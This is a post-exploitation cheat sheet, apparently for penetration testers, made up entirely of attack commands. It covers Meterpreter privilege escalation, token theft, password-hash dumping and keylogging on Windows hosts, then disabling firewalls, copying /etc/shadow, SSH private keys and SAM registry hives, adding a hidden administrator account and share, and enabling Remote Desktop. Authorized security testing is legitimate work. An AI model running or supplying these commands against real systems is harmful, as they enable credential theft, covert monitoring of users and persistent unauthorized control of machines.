<h2>Information Gathering</h2>
getuid
getpid
getsprivs
sysinfo
screenshot
run winenum.rb
run scraper.rb
run checkvm
run credscollect
run get_local_subnets
<h2>Escalating Privs</h2>
ps then migrate [pid]
getsystem
<h3>Tokens (use incognito)</h3>
list_tokens -u
impersonate_token
steal_token [pid]
rev2self
<h2>Retrieve Passwords</h2>
hashdump
cachedump
post/windows/gather/smart_hashdump
post/windows/gather/credentials/vnc
<h2>Session</h2>
enumdesktops
getdesktop
setdesktop
uictl disable keyboard
<h2>Keylog</h2>
keyscan_start
keyscan_dump
keyscan_stop
<h2>Nix Post Auth</h2>
<h3>Disable Firewall</h3>
/etc/init.d/iptables save
/etc/init.d/iptables stop
iptables-save > /root/firewall.rules
iptables-restore < /root/firewall.rules
<h3>Files to pull</h3>
/etc/passwd
/etc/shadow OR /etc/security/shadow (on AIX)
/etc/group OR /etc/gshadow
/home/*/.ssh/id*
/etc/sudoers
<h3>User Information</h3>
grep ^ssh /home/*/.*hist*
grep ^telnet /home/*/.*hist*
grep ^mysql /home/*/.*hist*
<h2>Windows Post Auth</h2>
<h3>Get current logged in user</h3>
@echo %USERNAME%
<h3>Add user</h3>
net user pentest password /add
net localgroup administrators pentest /add
<h3>Add share</h3>
net share nothing$=C:\ /grant:pentest,FULL /unlimited
<h3>Disable Firewall</h3>
netsh firewall set opmode disable
<h3>Auto Start Directories</h3>
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
C:\Documents And Settings\All Users\Start Menu\Programs\StartUp\
C:\WINDOWS\Start Menu\Programs\StartUp\
C:\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\
<h3>Accounts and Policies</h3>
net localgroup administrators OR net localgroup administrators /domain
net group "Domain Admins" /domain
net accounts OR net accounts /domain
<h3>Files to pull</h3>
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%WINDIR%\repair\sam OR system OR software OR security
reg save HKLM\Security security.hive
reg save HKLM\System system.hive
reg save HKLM\SAM sam.hive
<h3>Enable Remote Desktop</h3>
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f